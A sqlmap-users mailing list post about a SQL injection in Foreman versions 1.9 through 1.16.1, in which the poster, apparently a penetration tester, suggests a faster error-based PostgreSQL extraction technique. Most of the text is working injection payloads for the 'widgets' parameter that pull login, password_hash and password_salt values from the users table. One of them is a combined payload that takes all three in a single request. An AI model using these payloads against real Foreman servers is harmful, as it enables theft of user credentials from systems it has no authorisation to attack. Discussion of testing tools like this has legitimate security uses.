I’m currently exploiting a recent vulnerability announced in Foreman versions 1.9+ through 1.16.1. The available techniques are boolean, time, and error-based.
Error based is the fastest obviously, but it seems like it could be faster. Currently, it performs an error-based exfil in a similar way MySQL error-based injections are done, which is a single value at a time. IIRC, MySQL errors get truncated so that you generally can’t exfil more than 50 or so characters at a time, so this strategy makes sense in those cases. However, PostgreSQL errors that are bubbled up don’t (seem to) have this limitation and will return very lengthy error messages. Currently, sqlmap will grab a value per column per row per request. That looks like this. widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_salt AS CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1 widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_hash AS CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1 widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(login AS CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1 Each of these values take a single request/response. But they could easily be combined into one with each distinct value being pulled out with a regular expression. widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_salt AS CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_hash AS CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(login AS CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1 But there may be a reason sqlmap does this in the former way. Anyway, just my 2c.
signature.asc
Description: Message signed with OpenPGP
------------------------------------------------------------------------------ Check out the vibrant tech community on one of the world's most engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
